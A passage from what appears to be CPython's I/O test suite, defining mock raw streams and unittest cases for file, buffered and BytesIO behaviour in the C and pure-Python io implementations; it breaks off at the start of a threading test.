    def readinto(self, buf):
        """Fill *buf* from the head of the read stack; 0 when exhausted."""
        self._reads += 1
        max_len = len(buf)
        try:
            data = self._read_stack[0]
        except IndexError:
            self._extraneous_reads += 1
            return 0
        if data is None:
            # A None entry is consumed and surfaced as None (RawIOBase's
            # "no data available right now" signal for non-blocking reads).
            del self._read_stack[0]
            return None
        n = len(data)
        if len(data) <= max_len:
            # The whole chunk fits: consume it.
            del self._read_stack[0]
            buf[:n] = data
            return n
        else:
            # Partial fill: keep the remainder at the head of the stack.
            buf[:] = data[:max_len]
            self._read_stack[0] = data[max_len:]
            return max_len
    def truncate(self, pos=None):
        return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
    """Variant of the mock bound to the C implementation of RawIOBase."""
    pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
    """Variant of the mock bound to the pure-Python implementation of RawIOBase."""
    pass
class MockRawIO(MockRawIOWithoutRead):
    """Mock raw IO adding a read() method on top of the readinto()-only base."""
    def read(self, n=None):
        """Pop and return the next chunk from the read stack; b"" when exhausted."""
        self._reads += 1
        try:
            return self._read_stack.pop(0)
        except IndexError:
            # Only an exhausted stack is expected here; the original bare
            # 'except:' would also swallow KeyboardInterrupt and real bugs.
            self._extraneous_reads += 1
            return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
    # MockRawIO backed by the C implementation of RawIOBase.
    pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
    # MockRawIO backed by the pure-Python (_pyio) implementation of RawIOBase.
    pass
class MisbehavedRawIO(MockRawIO):
    """Raw I/O whose return values deliberately violate the RawIO contract,
    used to check that the buffered layers detect misbehaving streams."""
    def write(self, b):
        # Claim twice as many bytes written as were actually accepted.
        return 2 * super().write(b)
    def read(self, n=None):
        # Return the data duplicated, i.e. more than was requested.
        return 2 * super().read(n)
    def seek(self, pos, whence):
        # Bogus negative positions.
        return -123
    def tell(self):
        return -456
    def readinto(self, buf):
        super().readinto(buf)
        # Report five times the buffer length as the byte count.
        return 5 * len(buf)
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
    # Misbehaving raw stream backed by the C implementation.
    pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
    # Misbehaving raw stream backed by the pure-Python implementation.
    pass
class CloseFailureIO(MockRawIO):
    """Raw I/O whose first close() raises OSError; later closes are no-ops."""
    # Class-level default; shadowed on the instance once close() runs.
    closed = 0
    def close(self):
        if self.closed:
            return
        self.closed = 1
        raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
    # Failing-close stream backed by the C implementation.
    pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
    # Failing-close stream backed by the pure-Python implementation.
    pass
class MockFileIO:
    """Mixin for BytesIO-like classes that logs the size of every read.

    read_history records len(result) per read()/readinto() call, or None
    when read() returned None.
    """
    def __init__(self, data):
        self.read_history = []
        super().__init__(data)
    def read(self, n=None):
        data = super().read(n)
        self.read_history.append(len(data) if data is not None else None)
        return data
    def readinto(self, b):
        count = super().readinto(b)
        self.read_history.append(count)
        return count
class CMockFileIO(MockFileIO, io.BytesIO):
    # Read-logging BytesIO backed by the C implementation.
    pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
    # Read-logging BytesIO backed by the pure-Python implementation.
    pass
class MockUnseekableIO:
    """Mixin that makes a stream report and behave as unseekable.

    Subclasses must provide an UnsupportedOperation attribute matching
    the io implementation under test.
    """
    def seekable(self):
        return False
    def _unsupported(self):
        # Shared failure path for the positioning methods.
        raise self.UnsupportedOperation("not seekable")
    def seek(self, *args):
        self._unsupported()
    def tell(self, *args):
        self._unsupported()
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
    # Unseekable BytesIO for the C implementation; exposes its exception type.
    UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
    # Unseekable BytesIO for the pure-Python implementation.
    UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
    """Raw-IO-like writer that simulates a non-blocking stream.

    After block_on(char), a write whose data contains that char only
    accepts bytes up to the char; when the char is at the very front the
    write returns None (i.e. "would block") and the blocker is cleared.
    """
    def __init__(self):
        self._write_stack = []
        self._blocker_char = None
    def pop_written(self):
        """Return everything written so far and reset the record."""
        written = b"".join(self._write_stack)
        del self._write_stack[:]
        return written
    def block_on(self, char):
        """Block when a given char is encountered."""
        self._blocker_char = char
    def readable(self):
        return True
    def seekable(self):
        return True
    def writable(self):
        return True
    def write(self, b):
        b = bytes(b)
        if self._blocker_char:
            try:
                pos = b.index(self._blocker_char)
            except ValueError:
                pos = -1    # blocker not present: fall through to full write
            if pos == 0:
                # Blocker at the very front: cancel it and signal "would block".
                self._blocker_char = None
                return None
            if pos > 0:
                # Accept only the data preceding the blocker.
                self._write_stack.append(b[:pos])
                return pos
        self._write_stack.append(b)
        return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
    # Non-blocking writer for the C implementation; exposes its exception type.
    BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
    # Non-blocking writer for the pure-Python implementation.
    BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
    """Core I/O tests, run against both implementations.

    The attributes this class uses (self.open, self.FileIO, self.BytesIO,
    self.IOBase, ...) are injected onto the CIOTest/PyIOTest subclasses so
    the same tests exercise the C `io` and pure-Python `_pyio` modules.
    """
    def setUp(self):
        support.unlink(support.TESTFN)
    def tearDown(self):
        support.unlink(support.TESTFN)
    def write_ops(self, f):
        """Exercise write/seek/tell/truncate on a writable binary stream."""
        self.assertEqual(f.write(b"blah."), 5)
        f.truncate(0)
        # truncate() must not move the file position
        self.assertEqual(f.tell(), 5)
        f.seek(0)
        self.assertEqual(f.write(b"blah."), 5)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"Hello."), 6)
        self.assertEqual(f.tell(), 6)
        self.assertEqual(f.seek(-1, 1), 5)
        self.assertEqual(f.tell(), 5)
        self.assertEqual(f.write(bytearray(b" world\n\n\n")), 9)
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.write(b"h"), 1)
        self.assertEqual(f.seek(-1, 2), 13)
        self.assertEqual(f.tell(), 13)
        self.assertEqual(f.truncate(12), 12)
        # again: truncate() must not move the file position
        self.assertEqual(f.tell(), 13)
        self.assertRaises(TypeError, f.seek, 0.0)
    def read_ops(self, f, buffered=False):
        """Exercise read/readinto/seek on a stream holding b"hello world"
        followed by a newline."""
        data = f.read(5)
        self.assertEqual(data, b"hello")
        data = bytearray(data)
        self.assertEqual(f.readinto(data), 5)
        self.assertEqual(data, b" worl")
        # only 2 bytes remain; readinto leaves the buffer tail untouched
        self.assertEqual(f.readinto(data), 2)
        self.assertEqual(len(data), 5)
        self.assertEqual(data[:2], b"d\n")
        self.assertEqual(f.seek(0), 0)
        self.assertEqual(f.read(20), b"hello world\n")
        self.assertEqual(f.read(1), b"")
        self.assertEqual(f.readinto(bytearray(b"x")), 0)
        self.assertEqual(f.seek(-6, 2), 6)
        self.assertEqual(f.read(5), b"world")
        self.assertEqual(f.read(0), b"")
        self.assertEqual(f.readinto(bytearray()), 0)
        self.assertEqual(f.seek(-6, 1), 5)
        self.assertEqual(f.read(5), b" worl")
        self.assertEqual(f.tell(), 10)
        self.assertRaises(TypeError, f.seek, 0.0)
        if buffered:
            f.seek(0)
            self.assertEqual(f.read(), b"hello world\n")
            f.seek(6)
            self.assertEqual(f.read(), b"world\n")
            self.assertEqual(f.read(), b"")
    # Offset just past the 32-bit signed boundary, for large-file tests.
    LARGE = 2**31
    def large_file_ops(self, f):
        """Seek/write/truncate around the 2 GiB boundary."""
        assert f.readable()
        assert f.writable()
        self.assertEqual(f.seek(self.LARGE), self.LARGE)
        self.assertEqual(f.tell(), self.LARGE)
        self.assertEqual(f.write(b"xxx"), 3)
        self.assertEqual(f.tell(), self.LARGE + 3)
        self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
        self.assertEqual(f.truncate(), self.LARGE + 2)
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 2)
        self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
        self.assertEqual(f.tell(), self.LARGE + 2)
        self.assertEqual(f.seek(0, 2), self.LARGE + 1)
        self.assertEqual(f.seek(-1, 2), self.LARGE)
        self.assertEqual(f.read(2), b"x")
    def test_invalid_operations(self):
        # Try writing on a file opened in read mode and vice-versa.
        exc = self.UnsupportedOperation
        for mode in ("w", "wb"):
            with self.open(support.TESTFN, mode) as fp:
                self.assertRaises(exc, fp.read)
                self.assertRaises(exc, fp.readline)
        with self.open(support.TESTFN, "wb", buffering=0) as fp:
            self.assertRaises(exc, fp.read)
            self.assertRaises(exc, fp.readline)
        with self.open(support.TESTFN, "rb", buffering=0) as fp:
            self.assertRaises(exc, fp.write, b"blah")
            self.assertRaises(exc, fp.writelines, [b"blah\n"])
        with self.open(support.TESTFN, "rb") as fp:
            self.assertRaises(exc, fp.write, b"blah")
            self.assertRaises(exc, fp.writelines, [b"blah\n"])
        with self.open(support.TESTFN, "r") as fp:
            self.assertRaises(exc, fp.write, "blah")
            self.assertRaises(exc, fp.writelines, ["blah\n"])
            # Non-zero seeking from current or end pos
            self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
            self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
    def test_open_handles_NUL_chars(self):
        # Embedded NUL bytes in a filename must be rejected, not truncated.
        fn_with_NUL = 'foo\0bar'
        self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
        self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
    def test_raw_file_io(self):
        with self.open(support.TESTFN, "wb", buffering=0) as f:
            self.assertEqual(f.readable(), False)
            self.assertEqual(f.writable(), True)
            self.assertEqual(f.seekable(), True)
            self.write_ops(f)
        with self.open(support.TESTFN, "rb", buffering=0) as f:
            self.assertEqual(f.readable(), True)
            self.assertEqual(f.writable(), False)
            self.assertEqual(f.seekable(), True)
            self.read_ops(f)
    def test_buffered_file_io(self):
        with self.open(support.TESTFN, "wb") as f:
            self.assertEqual(f.readable(), False)
            self.assertEqual(f.writable(), True)
            self.assertEqual(f.seekable(), True)
            self.write_ops(f)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readable(), True)
            self.assertEqual(f.writable(), False)
            self.assertEqual(f.seekable(), True)
            self.read_ops(f, True)
    def test_readline(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.readline(), b"abc\n")
            self.assertEqual(f.readline(10), b"def\n")
            # a size limit smaller than the line truncates it
            self.assertEqual(f.readline(2), b"xy")
            self.assertEqual(f.readline(4), b"zzy\n")
            # embedded NUL does not terminate the line
            self.assertEqual(f.readline(), b"foo\x00bar\n")
            self.assertEqual(f.readline(None), b"another line")
            self.assertRaises(TypeError, f.readline, 5.3)
        with self.open(support.TESTFN, "r") as f:
            self.assertRaises(TypeError, f.readline, 5.3)
    def test_raw_bytes_io(self):
        f = self.BytesIO()
        self.write_ops(f)
        data = f.getvalue()
        self.assertEqual(data, b"hello world\n")
        f = self.BytesIO(data)
        self.read_ops(f, True)
    def test_large_file_ops(self):
        # On Windows and Mac OSX this test comsumes large resources; It takes
        # a long time to build the >2GB file and takes >2GB of disk space
        # therefore the resource must be enabled to run this test.
        if sys.platform[:3] == 'win' or sys.platform == 'darwin':
            support.requires(
                'largefile',
                'test requires %s bytes and a long time to run' % self.LARGE)
        with self.open(support.TESTFN, "w+b", 0) as f:
            self.large_file_ops(f)
        with self.open(support.TESTFN, "w+b") as f:
            self.large_file_ops(f)
    def test_with_open(self):
        for bufsize in (0, 1, 100):
            f = None
            with self.open(support.TESTFN, "wb", bufsize) as f:
                f.write(b"xxx")
            self.assertEqual(f.closed, True)
            f = None
            try:
                with self.open(support.TESTFN, "wb", bufsize) as f:
                    1/0
            except ZeroDivisionError:
                # the context manager must close the file even on error
                self.assertEqual(f.closed, True)
            else:
                self.fail("1/0 didn't raise an exception")
    # issue 5008
    def test_append_mode_tell(self):
        # In append mode, tell() reflects the end-of-file position.
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "ab", buffering=0) as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "ab") as f:
            self.assertEqual(f.tell(), 3)
        with self.open(support.TESTFN, "a") as f:
            self.assertTrue(f.tell() > 0)
    def test_destructor(self):
        # On destruction, __del__/close/flush must run exactly once, in order.
        record = []
        class MyFileIO(self.FileIO):
            def __del__(self):
                record.append(1)
                try:
                    f = super().__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super().close()
            def flush(self):
                record.append(3)
                super().flush()
        with support.check_warnings(('', ResourceWarning)):
            f = MyFileIO(support.TESTFN, "wb")
            f.write(b"xxx")
            del f
            support.gc_collect()
            self.assertEqual(record, [1, 2, 3])
            with self.open(support.TESTFN, "rb") as f:
                self.assertEqual(f.read(), b"xxx")
    def _check_base_destructor(self, base):
        record = []
        class MyIO(base):
            def __init__(self):
                # This exercises the availability of attributes on object
                # destruction.
                # (in the C version, close() is called by the tp_dealloc
                # function, not by __del__)
                self.on_del = 1
                self.on_close = 2
                self.on_flush = 3
            def __del__(self):
                record.append(self.on_del)
                try:
                    f = super().__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(self.on_close)
                super().close()
            def flush(self):
                record.append(self.on_flush)
                super().flush()
        f = MyIO()
        del f
        support.gc_collect()
        self.assertEqual(record, [1, 2, 3])
    def test_IOBase_destructor(self):
        self._check_base_destructor(self.IOBase)
    def test_RawIOBase_destructor(self):
        self._check_base_destructor(self.RawIOBase)
    def test_BufferedIOBase_destructor(self):
        self._check_base_destructor(self.BufferedIOBase)
    def test_TextIOBase_destructor(self):
        self._check_base_destructor(self.TextIOBase)
    def test_close_flushes(self):
        # Buffered data must reach the OS by the time close() returns.
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"xxx")
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"xxx")
    def test_array_writes(self):
        # write() must accept any buffer-protocol object, e.g. array.array.
        a = array.array('i', range(10))
        n = len(a.tobytes())
        with self.open(support.TESTFN, "wb", 0) as f:
            self.assertEqual(f.write(a), n)
        with self.open(support.TESTFN, "wb") as f:
            self.assertEqual(f.write(a), n)
    def test_closefd(self):
        self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
                          closefd=False)
    def test_read_closed(self):
        with self.open(support.TESTFN, "w") as f:
            f.write("egg\n")
        with self.open(support.TESTFN, "r") as f:
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.read(), "egg\n")
            file.seek(0)
            file.close()
            self.assertRaises(ValueError, file.read)
    def test_no_closefd_with_filename(self):
        # can't use closefd in combination with a file name
        self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
    def test_closefd_attr(self):
        with self.open(support.TESTFN, "wb") as f:
            f.write(b"egg\n")
        with self.open(support.TESTFN, "r") as f:
            self.assertEqual(f.buffer.raw.closefd, True)
            file = self.open(f.fileno(), "r", closefd=False)
            self.assertEqual(file.buffer.raw.closefd, False)
    def test_garbage_collection(self):
        # FileIO objects are collected, and collecting them flushes
        # all data to disk.
        with support.check_warnings(('', ResourceWarning)):
            f = self.FileIO(support.TESTFN, "wb")
            f.write(b"abcxxx")
            f.f = f    # reference cycle, so only the GC can reclaim it
            wr = weakref.ref(f)
            del f
            support.gc_collect()
        self.assertTrue(wr() is None, wr)
        with self.open(support.TESTFN, "rb") as f:
            self.assertEqual(f.read(), b"abcxxx")
    def test_unbounded_file(self):
        # Issue #1174606: reading from an unbounded stream such as /dev/zero.
        zero = "/dev/zero"
        if not os.path.exists(zero):
            self.skipTest("{0} does not exist".format(zero))
        if sys.maxsize > 0x7FFFFFFF:
            self.skipTest("test can only run in a 32-bit address space")
        if support.real_max_memuse < support._2G:
            self.skipTest("test requires at least 2GB of memory")
        with self.open(zero, "rb", buffering=0) as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "rb") as f:
            self.assertRaises(OverflowError, f.read)
        with self.open(zero, "r") as f:
            self.assertRaises(OverflowError, f.read)
    def test_flush_error_on_close(self):
        # A failing flush() must propagate from close(), yet leave the
        # stream marked closed.
        f = self.open(support.TESTFN, "wb", buffering=0)
        def bad_flush():
            raise OSError()
        f.flush = bad_flush
        self.assertRaises(OSError, f.close) # exception not swallowed
        self.assertTrue(f.closed)
    def test_multi_close(self):
        # close() must be idempotent; later operations raise ValueError.
        f = self.open(support.TESTFN, "wb", buffering=0)
        f.close()
        f.close()
        f.close()
        self.assertRaises(ValueError, f.flush)
    def test_RawIOBase_read(self):
        # Exercise the default RawIOBase.read() implementation (which calls
        # readinto() internally).
        rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
        self.assertEqual(rawio.read(2), b"ab")
        self.assertEqual(rawio.read(2), b"c")
        self.assertEqual(rawio.read(2), b"d")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"ef")
        self.assertEqual(rawio.read(2), b"g")
        self.assertEqual(rawio.read(2), None)
        self.assertEqual(rawio.read(2), b"")
    def test_types_have_dict(self):
        test = (
            self.IOBase(),
            self.RawIOBase(),
            self.TextIOBase(),
            self.StringIO(),
            self.BytesIO()
        )
        for obj in test:
            self.assertTrue(hasattr(obj, "__dict__"))
    def test_opener(self):
        # open(..., opener=...) must use the fd the opener returns.
        with self.open(support.TESTFN, "w") as f:
            f.write("egg\n")
        fd = os.open(support.TESTFN, os.O_RDONLY)
        def opener(path, flags):
            return fd
        with self.open("non-existent", "r", opener=opener) as f:
            self.assertEqual(f.read(), "egg\n")
    def test_fileio_closefd(self):
        # Issue #4841
        with self.open(__file__, 'rb') as f1, \
             self.open(__file__, 'rb') as f2:
            fileio = self.FileIO(f1.fileno(), closefd=False)
            # .__init__() must not close f1
            fileio.__init__(f2.fileno(), closefd=False)
            f1.readline()
            # .close() must not close f2
            fileio.close()
            f2.readline()
    def test_nonbuffered_textio(self):
        # Unbuffered text I/O is invalid; it must not leak a warning either.
        with warnings.catch_warnings(record=True) as recorded:
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', buffering=0)
            support.gc_collect()
        self.assertEqual(recorded, [])
    def test_invalid_newline(self):
        with warnings.catch_warnings(record=True) as recorded:
            with self.assertRaises(ValueError):
                self.open(support.TESTFN, 'w', newline='invalid')
            support.gc_collect()
        self.assertEqual(recorded, [])
class CIOTest(IOTest):
    # Runs IOTest against the C io implementation (attributes injected
    # onto the class by the test module's setup code).
    def test_IOBase_finalize(self):
        # Issue #12149: segmentation fault on _PyIOBase_finalize when both a
        # class which inherits IOBase and an object of this class are caught
        # in a reference cycle and close() is already in the method cache.
        class MyIO(self.IOBase):
            def close(self):
                pass
        # create an instance to populate the method cache
        MyIO()
        obj = MyIO()
        obj.obj = obj
        wr = weakref.ref(obj)
        del MyIO
        del obj
        support.gc_collect()
        self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
    # Runs IOTest against the pure-Python _pyio implementation.
    pass
class CommonBufferedTests:
    # Tests common to BufferedReader, BufferedWriter and BufferedRandom.
    # Mixed into concrete TestCase classes that set self.tp and the mock
    # raw-IO factories for one io implementation.
    def test_detach(self):
        raw = self.MockRawIO()
        buf = self.tp(raw)
        self.assertIs(buf.detach(), raw)
        # a second detach() must fail, but repr() must keep working
        self.assertRaises(ValueError, buf.detach)
        repr(buf) # Should still work
    def test_fileno(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        # delegated to the raw stream, whose fileno() is hard-coded to 42
        self.assertEqual(42, bufio.fileno())
    @unittest.skip('test having existential crisis')
    def test_no_fileno(self):
        # XXX will we always have fileno() function? If so, kill
        # this test. Else, write it.
        pass
    def test_invalid_args(self):
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        # Invalid whence
        self.assertRaises(ValueError, bufio.seek, 0, -1)
        self.assertRaises(ValueError, bufio.seek, 0, 9)
    def test_override_destructor(self):
        # Overridden __del__/close/flush must all run on destruction.
        tp = self.tp
        record = []
        class MyBufferedIO(tp):
            def __del__(self):
                record.append(1)
                try:
                    f = super().__del__
                except AttributeError:
                    pass
                else:
                    f()
            def close(self):
                record.append(2)
                super().close()
            def flush(self):
                record.append(3)
                super().flush()
        rawio = self.MockRawIO()
        bufio = MyBufferedIO(rawio)
        writable = bufio.writable()
        del bufio
        support.gc_collect()
        if writable:
            self.assertEqual(record, [1, 2, 3])
        else:
            # read-only streams have nothing to flush
            self.assertEqual(record, [1, 2])
    def test_context_manager(self):
        # Test usability as a context manager
        rawio = self.MockRawIO()
        bufio = self.tp(rawio)
        def _with():
            with bufio:
                pass
        _with()
        # bufio should now be closed, and using it a second time should raise
        # a ValueError.
        self.assertRaises(ValueError, _with)
    def test_error_through_destructor(self):
        # Test that the exception state is not modified by a destructor,
        # even if close() fails.
        rawio = self.CloseFailureIO()
        def f():
            self.tp(rawio).xyzzy
        with support.captured_output("stderr") as s:
            self.assertRaises(AttributeError, f)
        s = s.getvalue().strip()
        if s:
            # The destructor *may* have printed an unraisable error, check it
            self.assertEqual(len(s.splitlines()), 1)
            self.assertTrue(s.startswith("Exception OSError: "), s)
            self.assertTrue(s.endswith(" ignored"), s)
    def test_repr(self):
        # repr() must include the raw stream's name once it has one.
        raw = self.MockRawIO()
        b = self.tp(raw)
        clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
        self.assertEqual(repr(b), "<%s>" % clsname)
        raw.name = "dummy"
        self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
        raw.name = b"dummy"
        self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
    def test_flush_error_on_close(self):
        raw = self.MockRawIO()
        def bad_flush():
            raise OSError()
        raw.flush = bad_flush
        b = self.tp(raw)
        self.assertRaises(OSError, b.close) # exception not swallowed
        self.assertTrue(b.closed)
    def test_close_error_on_close(self):
        # When both flush() and close() fail, the close() error must be
        # raised with the flush() error chained as its __context__.
        raw = self.MockRawIO()
        def bad_flush():
            raise OSError('flush')
        def bad_close():
            raise OSError('close')
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(OSError) as err: # exception not swallowed
            b.close()
        self.assertEqual(err.exception.args, ('close',))
        self.assertIsInstance(err.exception.__context__, OSError)
        self.assertEqual(err.exception.__context__.args, ('flush',))
        self.assertFalse(b.closed)
    def test_nonnormalized_close_error_on_close(self):
        # Issue #21677
        raw = self.MockRawIO()
        def bad_flush():
            raise non_existing_flush
        def bad_close():
            raise non_existing_close
        raw.close = bad_close
        b = self.tp(raw)
        b.flush = bad_flush
        with self.assertRaises(NameError) as err: # exception not swallowed
            b.close()
        self.assertIn('non_existing_close', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('non_existing_flush', str(err.exception.__context__))
        self.assertFalse(b.closed)
    def test_multi_close(self):
        # close() must be idempotent; later flush() raises ValueError.
        raw = self.MockRawIO()
        b = self.tp(raw)
        b.close()
        b.close()
        b.close()
        self.assertRaises(ValueError, b.flush)
    def test_unseekable(self):
        bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
        self.assertRaises(self.UnsupportedOperation, bufio.tell)
        self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
    def test_readonly_attributes(self):
        # the .raw attribute must not be reassignable
        raw = self.MockRawIO()
        buf = self.tp(raw)
        x = self.MockRawIO()
        with self.assertRaises(AttributeError):
            buf.raw = x
class SizeofTest:
    # Mixin checking that sys.getsizeof() accounts for the internal buffer
    # and that the buffer's memory is released on close(). CPython-specific.
    @support.cpython_only
    def test_sizeof(self):
        bufsize1 = 4096
        bufsize2 = 8192
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize1)
        # object size minus buffer size should be constant across buffer sizes
        size = sys.getsizeof(bufio) - bufsize1
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize2)
        self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
    @support.cpython_only
    def test_buffer_freeing(self) :
        # The internal buffer must be freed (reflected by getsizeof) on close.
        bufsize = 4096
        rawio = self.MockRawIO()
        bufio = self.tp(rawio, buffer_size=bufsize)
        size = sys.getsizeof(bufio) - bufsize
        bufio.close()
        self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
    """BufferedReader-specific tests; self.tp is set by C/Py subclasses."""
    read_mode = "rb"
    def test_constructor(self):
        # __init__ may be called repeatedly to re-target the same object.
        rawio = self.MockRawIO([b"abc"])
        bufio = self.tp(rawio)
        bufio.__init__(rawio)
        bufio.__init__(rawio, buffer_size=1024)
        bufio.__init__(rawio, buffer_size=16)
        self.assertEqual(b"abc", bufio.read())
        # non-positive buffer sizes are rejected
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
        self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
        rawio = self.MockRawIO([b"abc"])
        bufio.__init__(rawio)
        self.assertEqual(b"abc", bufio.read())
    def test_uninitialized(self):
        # Using an instance before __init__ must fail cleanly, not crash.
        bufio = self.tp.__new__(self.tp)
        del bufio
        bufio = self.tp.__new__(self.tp)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               bufio.read, 0)
        bufio.__init__(self.MockRawIO())
        self.assertEqual(bufio.read(0), b'')
    def test_read(self):
        for arg in (None, 7):
            rawio = self.MockRawIO((b"abc", b"d", b"efg"))
            bufio = self.tp(rawio)
            self.assertEqual(b"abcdefg", bufio.read(arg))
        # Invalid args
        self.assertRaises(ValueError, bufio.read, -2)
    def test_read1(self):
        # read1() performs at most one raw read; _reads counts them.
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"a", bufio.read(1))
        self.assertEqual(b"b", bufio.read1(1))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"c", bufio.read1(100))
        self.assertEqual(rawio._reads, 1)
        self.assertEqual(b"d", bufio.read1(100))
        self.assertEqual(rawio._reads, 2)
        self.assertEqual(b"efg", bufio.read1(100))
        self.assertEqual(rawio._reads, 3)
        self.assertEqual(b"", bufio.read1(100))
        self.assertEqual(rawio._reads, 4)
        # Invalid args
        self.assertRaises(ValueError, bufio.read1, -1)
    def test_readinto(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        b = bytearray(2)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"cd")
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ef")
        # short read at EOF leaves the buffer tail untouched
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"gf")
        self.assertEqual(bufio.readinto(b), 0)
        self.assertEqual(b, b"gf")
        rawio = self.MockRawIO((b"abc", None))
        bufio = self.tp(rawio)
        self.assertEqual(bufio.readinto(b), 2)
        self.assertEqual(b, b"ab")
        self.assertEqual(bufio.readinto(b), 1)
        self.assertEqual(b, b"cb")
    def test_readlines(self):
        def bufio():
            rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
            return self.tp(rawio)
        self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
        self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
        self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
    def test_buffering(self):
        data = b"abcdefghi"
        dlen = len(data)
        # [buffer size, buffered read sizes, expected raw read sizes]
        tests = [
            [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
            [ 100, [ 3, 3, 3], [ dlen ] ],
            [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
        ]
        for bufsize, buf_read_sizes, raw_read_sizes in tests:
            rawio = self.MockFileIO(data)
            bufio = self.tp(rawio, buffer_size=bufsize)
            pos = 0
            for nbytes in buf_read_sizes:
                self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
                pos += nbytes
            # this is mildly implementation-dependent
            self.assertEqual(rawio.read_history, raw_read_sizes)
    def test_read_non_blocking(self):
        # Inject some None's in there to simulate EWOULDBLOCK
        rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcd", bufio.read(6))
        self.assertEqual(b"e", bufio.read(1))
        self.assertEqual(b"fg", bufio.read())
        self.assertEqual(b"", bufio.peek(1))
        # a would-block raw read surfaces as a None result
        self.assertIsNone(bufio.read())
        self.assertEqual(b"", bufio.read())
        rawio = self.MockRawIO((b"a", None, None))
        self.assertEqual(b"a", rawio.readall())
        self.assertIsNone(rawio.readall())
    def test_read_past_eof(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read(9000))
    def test_read_all(self):
        rawio = self.MockRawIO((b"abc", b"d", b"efg"))
        bufio = self.tp(rawio)
        self.assertEqual(b"abcdefg", bufio.read())
    @unittest.skipUnless(threading, 'Threading required for this test.')
    @support.requires_resource('cpu')
    def test_threads(self):
        try:
